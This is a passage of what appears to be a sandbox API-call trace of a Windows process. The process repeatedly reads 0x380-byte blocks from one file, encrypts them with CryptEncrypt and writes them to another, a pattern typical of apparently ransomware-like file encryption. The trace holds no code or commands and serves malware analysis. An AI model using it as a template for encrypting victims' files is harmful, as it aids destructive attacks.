lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.328] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.328] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.328] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.328] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.329] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.329] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.329] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.329] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.329] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.329] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.330] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.330] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.330] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.330] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.330] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.331] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.331] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.331] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.331] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.331] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.331] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.332] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.332] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.332] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.332] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.332] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.333] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.333] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.333] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.333] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.333] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.334] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.334] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.334] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.334] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.334] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.334] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.334] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.334] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.334] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.335] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.335] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.335] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0279.335] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0279.335] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, 